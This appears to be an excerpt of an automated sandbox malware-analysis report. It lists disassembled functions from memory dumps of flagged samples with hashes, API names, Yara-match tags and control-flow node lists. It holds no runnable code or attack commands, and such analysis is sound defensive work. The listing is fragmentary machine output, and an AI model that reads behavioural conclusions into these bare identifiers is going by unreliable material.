                                                                                                                              • Instruction ID: da6c8e6c686697cd5645bba064093634a5bbaf4ccc199a03bcf842f5b6ad256a
                                                                                                                              • Opcode Fuzzy Hash: a46ad5fa9c2e65ff4a820ecddd5525186a00737771923a7c258114700024f662
                                                                                                                              • Instruction Fuzzy Hash: 59115E32A04218EFCF16AF98E848A9C7B71FF44764F108219F86AA72D0CB715F50CB80
                                                                                                                              Function 0183EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9926bae477a916556eb6090b03d0ed50252cf7541d542a5266813736abbe2090
                                                                                                                              • Instruction ID: f5e18fc551320f289086265f05308abfa155bdf5877379bf75be2eed21e04170
                                                                                                                              • Opcode Fuzzy Hash: 9926bae477a916556eb6090b03d0ed50252cf7541d542a5266813736abbe2090
                                                                                                                              • Instruction Fuzzy Hash: 2AE11270D00608DFCB26DFA9D980A9DFBF1BF88314F18456AE656E7221D770AA41CF91
                                                                                                                              Function 0188EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: ac843522bbb96b06b35fc705299b9e31522e06d4ba7e89567d5bb924e68400c5
                                                                                                                              • Instruction ID: 0c94534f435bcf5c5ba9b0c215f88af59e6c59361affc55ee3909de5232c8642
                                                                                                                              • Opcode Fuzzy Hash: ac843522bbb96b06b35fc705299b9e31522e06d4ba7e89567d5bb924e68400c5
                                                                                                                              • Instruction Fuzzy Hash: 32714575E00219DFDF06EFA8C984ADDBBF5BF48314F14402AEA05EB255D734AA05CBA4
                                                                                                                              Function 0188F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: 18075df853acab8bfb1b4cca3153217527be7b890fbd167ab79e2467fffe5cff
                                                                                                                              • Instruction ID: 168e3def5c37e6e590f925330fec3c894de0ef2e973b389546cf2a6766df3e54
                                                                                                                              • Opcode Fuzzy Hash: 18075df853acab8bfb1b4cca3153217527be7b890fbd167ab79e2467fffe5cff
                                                                                                                              • Instruction Fuzzy Hash: E8511F76E002199FDF09DF98D845ADDBBF1BF48314F18812AEA15EB250D738AA05CF54
                                                                                                                              Function 018159C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 0-2766056989
                                                                                                                              • Opcode ID: 7da5a0cac2dee40d84d11898612888969fc186be5ddf28f5f506de092c525494
                                                                                                                              • Instruction ID: aa7678f8c0d062f7195c932d7439eeebe848d023b8ac79736e37707c0bb49fdc
                                                                                                                              • Opcode Fuzzy Hash: 7da5a0cac2dee40d84d11898612888969fc186be5ddf28f5f506de092c525494
                                                                                                                              • Instruction Fuzzy Hash: 12324A71D0426ADFDB21CF68C844BE9BBB8BB4A304F1041E9D549E7245E7B49B84CF91
                                                                                                                              Function 01857D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                                                              • Instruction ID: b9fc8e80245fd192988d574163cb2820847d0600ef85f39aa1b81ee0d85bb4ff
                                                                                                                              • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                                                              • Instruction Fuzzy Hash: C191B471E0021A9FEFA4DF6DC880ABEBBA5EF44720F94851AED55E72C0D7309B408B51
                                                                                                                              Function 0182D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: Bl$l
                                                                                                                              • API String ID: 3446177414-208461968
                                                                                                                              • Opcode ID: 39fe366d9adfe21fe3ddfc66e8e64fba9933f3c998949ee2e02c31897cffa8b5
                                                                                                                              • Instruction ID: 2e3c79eef6dc54273f2f6d23d8599d825593375fa3ddc783737f9fabd8b77ed4
                                                                                                                              • Opcode Fuzzy Hash: 39fe366d9adfe21fe3ddfc66e8e64fba9933f3c998949ee2e02c31897cffa8b5
                                                                                                                              • Instruction Fuzzy Hash: DEA19331A003398FEB36DB98C894BA9BBB5BB45304F0441A9D909E7241DB74AFC5CF52
                                                                                                                              Function 01855DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 01855E34
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                              • String ID: pow
                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                              • Opcode ID: b4df59d50e63d320ace5456afd988f9fb21f86410a833f2dcccd142544ac1230
                                                                                                                              • Instruction ID: 3c2704467a56fe6e9b5c97841e4bf6a598658b839c67e8743aa1e2fcc4c4689d
                                                                                                                              • Opcode Fuzzy Hash: b4df59d50e63d320ace5456afd988f9fb21f86410a833f2dcccd142544ac1230
                                                                                                                              • Instruction Fuzzy Hash: 47519A7190860A9BDBE2B61CC90137A3FD6EB10750F10C968ECD6CA299EB3487949B47
                                                                                                                              Function 01844C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0$Flst
                                                                                                                              • API String ID: 0-758220159
                                                                                                                              • Opcode ID: 3497391cd8975f644316344b2a053fcfc91c8261d7fc83f56086286aa8bd22ac
                                                                                                                              • Instruction ID: b89f470c5545e364aac0240a4a73d329e7cfc55a26fa9aaece6e127a76d546a1
                                                                                                                              • Opcode Fuzzy Hash: 3497391cd8975f644316344b2a053fcfc91c8261d7fc83f56086286aa8bd22ac
                                                                                                                              • Instruction Fuzzy Hash: 855168B1A012188FDF26DF99D984769FBF4FF44758F14802AD489DB252EB70DA85CB80
                                                                                                                              Function 0183D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RtlDebugPrintTimes.NTDLL ref: 0183D959
                                                                                                                                • Part of subcall function 01814859: RtlDebugPrintTimes.NTDLL ref: 018148F7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: $$$
                                                                                                                              • API String ID: 3446177414-233714265
                                                                                                                              • Opcode ID: 7a4f51558d195b918ce69548a025185b2df6a886ce6bc82d6b7d9ab16d796c85
                                                                                                                              • Instruction ID: 57bf7d5a96605bcc600d822be893cbfe60a8c053b9cf10c18540582745f029dc
                                                                                                                              • Opcode Fuzzy Hash: 7a4f51558d195b918ce69548a025185b2df6a886ce6bc82d6b7d9ab16d796c85
                                                                                                                              • Instruction Fuzzy Hash: 0F510371A0434ADFDB22DFA8C48479DBBF1BF84318F584619C905EB286C774AA81CBC1
                                                                                                                              Function 0188FD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: $
                                                                                                                              • API String ID: 3446177414-3993045852
                                                                                                                              • Opcode ID: f831aa54af6154645f87a02aaaf337e6789caf9d28acf6542306568f46f64642
                                                                                                                              • Instruction ID: 3f85dd2d37f84a8adbefa09f57335f98bc474de37332ea3c32bca3816c1e5ae5
                                                                                                                              • Opcode Fuzzy Hash: f831aa54af6154645f87a02aaaf337e6789caf9d28acf6542306568f46f64642
                                                                                                                              • Instruction Fuzzy Hash: EE415075A00209AFDB11EF99C940AEEBBB5FF48714F140119EA04EB342D771DE51CBA0
                                                                                                                              Function 0180DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: 0$0
                                                                                                                              • API String ID: 3446177414-203156872
                                                                                                                              • Opcode ID: 88263c5b2ab55f6be2b90014394b78b4413f9074023ea0212a563dd62236d333
                                                                                                                              • Instruction ID: 75dc5bc1d9f3ef4ea618496ef49871c628c1d38ccd7fc14d8e880daf378c995f
                                                                                                                              • Opcode Fuzzy Hash: 88263c5b2ab55f6be2b90014394b78b4413f9074023ea0212a563dd62236d333
                                                                                                                              • Instruction Fuzzy Hash: 2F415EB160870A9FD351CF68C944A17BBE5BB89314F048A2EF588DB341D771EA05CB96

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:2.5%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:3
                                                                                                                              Total number of Limit Nodes:0
                                                                                                                              execution_graph 12157 599330a 12158 5993324 12157->12158 12159 599332f closesocket 12158->12159

                                                                                                                              Executed Functions

                                                                                                                              Function 0596DC53 Relevance: .1, Instructions: 105COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 83 596dc53-596dc74 84 596dc76-596dc7e 83->84 85 596dcf4-596dd2e call 5994c9a 83->85 88 596dc80-596dcae 84->88 89 596dc19-596dc40 84->89 91 596dd47-596dd66 call 599156a 85->91 92 596dd30-596dd44 call 599185a 85->92 88->85 96 596dd6b-596dd76 91->96 92->91 99 596dd92 96->99 100 596dd78-596dd80 96->100 101 596dd94-596dd9b 99->101 100->101 102 596dd82-596dd88 100->102 104 596dd9d-596dda3 101->104 105 596dda9-596ddb4 101->105 102->101 103 596dd8a-596dd90 102->103 103->101 104->105
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Offset: 05920000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_5920000_uGMCFMVqKoR.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 250e6c34fe1763016df1c2f6af87da29a2436e134e3f9aed025aa13ea3d2f518
                                                                                                                              • Instruction ID: f11f0cd0114040bc218b93aa2567818972bf3f94fd60b2fb437ac7d93a9ff9ee
                                                                                                                              • Opcode Fuzzy Hash: 250e6c34fe1763016df1c2f6af87da29a2436e134e3f9aed025aa13ea3d2f518
                                                                                                                              • Instruction Fuzzy Hash: 9D3146B1A04706FFCB25DF78D8589EABBF4FB4A300F04096AD4694B101D7716459D791
                                                                                                                              Function 0599330A Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 599330a-599333d call 596b06a call 5993eda closesocket
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Offset: 05920000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_5920000_uGMCFMVqKoR.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: closesocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2781271927-0
                                                                                                                              • Opcode ID: ded9dcc626c57722737332cb0165a4f0b5a6a2357c0249e959f935da1990eded
                                                                                                                              • Instruction ID: 64493821d579a91afc68c0eb047be187bc338ba5443d2162834b0ae68ba84108
                                                                                                                              • Opcode Fuzzy Hash: ded9dcc626c57722737332cb0165a4f0b5a6a2357c0249e959f935da1990eded
                                                                                                                              • Instruction Fuzzy Hash: 8EE08C35200114BBC624EA99CC04C9B77ADEFC5311B108419FE28A7240D630BA118BF0

                                                                                                                              Non-executed Functions

                                                                                                                              Function 059737CA Relevance: 22.8, Strings: 18, Instructions: 309COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Offset: 05920000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_5920000_uGMCFMVqKoR.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (u$1$4$;Q$B$DJ$KL$N?$Q1$W}$c;$kdv$nx$q3$}=$7$P$v
                                                                                                                              • API String ID: 0-3778568043
                                                                                                                              • Opcode ID: ff7462e6592b0619ddeabeea777654d9b3fd42e275dee99f68dbc5008fe29da9
                                                                                                                              • Instruction ID: 58a54e7cea2e5beabbd7f34b082d99db85d5791e363e1e7e6be76a31d4628467
                                                                                                                              • Opcode Fuzzy Hash: ff7462e6592b0619ddeabeea777654d9b3fd42e275dee99f68dbc5008fe29da9
                                                                                                                              • Instruction Fuzzy Hash: 1AF1B2B0D0521CCBDB28CF95C895BECBBB2BB48308F20859AC5697B381C7B55A84DF45
                                                                                                                              Function 05970284 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Offset: 05920000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_5920000_uGMCFMVqKoR.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ?_O
                                                                                                                              • API String ID: 0-3129901135
                                                                                                                              • Opcode ID: 4eb20bd9ff8b1927237b39f7a2bc7f67db70f0cc64fa9ec9f5d2a158ca97ce84
                                                                                                                              • Instruction ID: 535789f2205138ecc6bfb65f84e91ba1aea3a51c949fd718d231768b5069d35e
                                                                                                                              • Opcode Fuzzy Hash: 4eb20bd9ff8b1927237b39f7a2bc7f67db70f0cc64fa9ec9f5d2a158ca97ce84
                                                                                                                              • Instruction Fuzzy Hash: 57F0E9B791002D93CE39DE58A8849FAB36DEF95214F0006DBE94D63100F5B6AA468AD5
                                                                                                                              Function 0596FC25 Relevance: .0, Instructions: 18COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Offset: 05920000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_5920000_uGMCFMVqKoR.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b45b848a3d8dc63952e28112be17a89f1db365559c668125f40855f0ef5d5102
                                                                                                                              • Instruction ID: 03bd0d3401c0e7bc8f7d7419e0d2bbe68a03ac09ef4106d547d38a0ac4feaa38
                                                                                                                              • Opcode Fuzzy Hash: b45b848a3d8dc63952e28112be17a89f1db365559c668125f40855f0ef5d5102
                                                                                                                              • Instruction Fuzzy Hash: F0C02B17F202041170103C0E3C037F1F794C45347DD002357DC0CB31005103C40660DC